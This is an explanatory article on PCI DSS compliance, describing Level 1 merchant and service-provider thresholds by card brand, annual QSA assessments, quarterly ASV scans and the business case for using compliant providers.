PCI DSS (Payment Card Industry Data Security Standards) refers to the payment cards industry data security standards. PCI data security standards are requirements determined by a council (PCI SSC) consisting of representatives of companies with global card networks such as American Express, MasterCard, Visa, Discover, and JCB to ensure the security of card and cardholder data.
All global banks that offer Visa, Mastercard, American Express, Discover, and JCB cards to their customers and accept payments with these cards oblige their merchants to comply with various security levels required under PCI DSS and are responsible for overseeing this.
PCI DSS Level 1 is the highest level of these standards and is mandatory for all companies that will store card data in their systems and all companies that provide services to other companies as service providers.
In other words, secure card storage can only be done by companies with PCI DSS Level 1 compliance certificates or that receive service from an infrastructure service provider company according to international standards.
Companies must regularly undergo internal and external security screenings by authorized independent audit institutions to obtain PCI DSS Level 1 certification. It manages its internal systems and operations according to a relatively comprehensive list of criteria and rules. In addition, all processes and procedures are subject to detailed on-site audits every year.
As it can be understood, PCI DSS compliance requires significant operational and technical investments for a company that does not have payment infrastructures as its core business. In addition, to achieve PCI compliance, you must endure a cost- and labor-intensive, resource- and ongoing compliance and certification process. As a result, it is quite contrary to the business world’s understanding of business conduct and productivity.
In all these processes, many corporate companies worldwide prefer to partner with companies that specialize in this field and offer payment technologies infrastructure with PCI DSS Level 1 compliant systems to provide their customers with a secure payment infrastructure that complies with international standards.
What is PCI Compliance?
PCI DSS compliance is the Payment Card Industry Data Security Standard. PCI DSS is a set of security requirements established by the PCI SSC to ensure that all companies that process, store, or transmit credit card or cardholder data maintain a secure environment. The independent PCI Council created by major credit card brands such as Visa, MasterCard, American Express, Discover, and JCB rated PCI DSS compliance levels at four primary levels.
The PCI DSS, which came into place in 2004, requires different actions from different organizations based on the number and type of credit card transactions they make each year.
The PCI Security Standards Council (PCI SSC) established compliance levels recognizing that security risks for merchants, service providers, and their credit card data increase with the number of payment card transactions processed. Therefore, the fewer transactions, the lower the level and the fewer requirements organizations need to meet to be PCI compliant.
What is PCI DSS Level 1?
Stated, PCI DSS Level 1 is a set of requirements designed to ensure the highest level of security for businesses that store, transmit, or process credit card data.
The highest compliance level, PCI DSS Level 1, identifies any merchant who processes more than 6 million Visa transactions per year. This high level of verification is granted only if the merchant, at Visa’s discretion, meets level 1 requirements set to minimize risk to the system.
PCI Compliance Level 1 is one of four PCI merchant compliance levels and two service provider compliance levels established to protect the security of credit card and cardholder data in e-commerce and in-store transactions.
A “Level 1” merchant is defined by the Payment Card Industry Data Security Standard (PCI DSS) as someone who processes at least 1 million, 2.5 million, or 6 million transactions per year, depending on which credit cards the merchant accepts. Therefore, PCI Compliance Level 1 is the highest and most stringent PCI DSS level.
Merchants and service providers exposed to a breach or cyberattack resulting in the compromise of credit card or cardholder data must meet PCI Level 1 requirements, regardless of size, processing, storage, or transmission.
PCI Merchant Level 1 criteria depend on the merchant’s accepted brands of payment or credit cards:
- Visa, Mastercard, and Discover identify Tier 1 merchants who process more than 6 million credit cards per year.
- Level 1 requires at least 2.5 million transactions per year from American Express.
- Level 1 of JCB starts with 1 million credit card transactions per year.
Merchants aren’t the only entities that need to be PCI compliant. For example, to accept payment cards, payment and internet service providers (ISPs) must also demonstrate ongoing and ongoing security of their cardholder environments against data breach and PCI compliance.
What Does PCI DSS Level 1 Mean for Your Business?
Having PCI DSS Level 1 certification makes you appear more trustworthy to the consumer and saves you costly non-compliance penalties. In addition, if your business is PCI compliant, they can help you negotiate with banks because they know you’re serious about the security of personal data and credit information.
Having PCI DSS Level 1 certification or working with a PCI DSS Level 1 compliant service provider has several benefits for your business and website, including:
- It helps avoid fines that can be pretty high if security is compromised.
- Hosting includes quarterly scanning by an approved ASV mandated by PCI.
- Any encoding or configuration-related issues flagged by the ASV scan will be automatically fixed.
- Annual penetration testing is performed by an external party to test the security of the infrastructure.
- File Integrity Monitoring (FIM) will be used to verify any changes to the source code.
- Hosting will specifically provide a PCI DSS Level 1 hosting platform that meets all 12 PCI requirements.
- PCI compliance reduces the risk of fraud and prevents a compromise.
- Banks can give you better rates as a Merchant because you are PCI compliant.
- Since you can put the PCI DSS logo on your website, which indicates that you are PCI compliant, you will be reassuring for online shoppers.
How Do Level 1 Merchants Comply with PCI DSS?
Following an on-site audit, PCI Level 1 merchant and service providers must obtain an annual Compliance Report from a Qualified Security Assessor (QSA) or Internal Security Assessor (ISA) to comply with PCI DSS.
Those at PCI Levels 2, 3, and 4 can self-assess by completing the PCI DSS Self-Assessment Questionnaire (SAQ) provided by the security standards council.
The PCI Level 1 criteria for merchants are:
- More than 6 million Mastercard, Visa, or Discover transactions are processed per year OR
- Processes more than 2.5 million American Express transactions per year OR
- Processes more than 1 million JCB transactions per year OR
- A data breach or cyberattack resulting in the capture of cardholder data OR
- Defined as Level 1 by another card issuer
The PCI Level 1 validation requirements for merchants are:
- Annual Compliance Report (ROC) by Qualified Security Assessor (QSA) or Internal Security Assessor
- Quarterly network scan by Approved Scanning Vendor (ASV)
In addition, merchants must notify the “receiving bank” of the results of their audits. Buyers are also subject to merchant’s payment mark rules and procedures regarding PCI compliance.
The verification requirements are somewhat stricter given the higher processing level associated with PCI Level 1. For PCI level 1 compliance, the merchant must pass annual compliance assessments by a Qualified Security Assessor (QSA) in addition to the level 2, 3, and 4 requirements.
The annual PCI compliance assessment will consist of a series of steps taken by QSA, including a review of your point-of-sale (POS) system, a detailed review of vulnerability areas, and a list of priority improvements to prevent attacks. After the assessment is over, your job is to develop security protocols that will monitor the forward compatibility of your systems.
While PCI evaluation may seem like a long and arduous process, the risks of staying non-compliant are astronomical. Breach of customer card data not only damages the reputation of your business, but you can expect to be sued by card brands and potentially by any number of banks.
What is a PCI Level 1 Service Provider?
Service providers process payments or provide services such as internet services for merchants and receiving banks. Therefore, the criteria and validation requirements for PCI Level 1 service providers are slightly different from PCI Level 1 merchants:
PCI Level 1 criteria for Service Providers are:
- Applicable to service providers that store, process, or transmit more than 300,000 credit card transactions per year.
PCI Level 1 requirements for Service Providers are:
- Annual report on compliance (AOC and ROC) prepared by the Qualified Security Auditor (QSA).
- Quarterly network scan by Approved Scanning Vendor (ASV)
- Penetration Test
- Internal Scan
If you’re new to PCI compliance, the PCI Security Standards Council website is the best place to start. You can find many resources and PCI SSC-approved service providers and vendors on the PCI SSC site. In addition, many PCI-compliant vendors on the market will handle the process with minimal intervention.
PCI compliance is undoubtedly a complex process, but there is good reason for this challenge. Customer payment data is compromised, and any business that wants to use it should do its best to protect it.
If the PCI compliance process is too overwhelming to handle on your own, find a PCI compliant vendor to help guide you. First, however, make sure you are fully aware of PCI compliance standards, as your business is ultimately responsible for credit card data.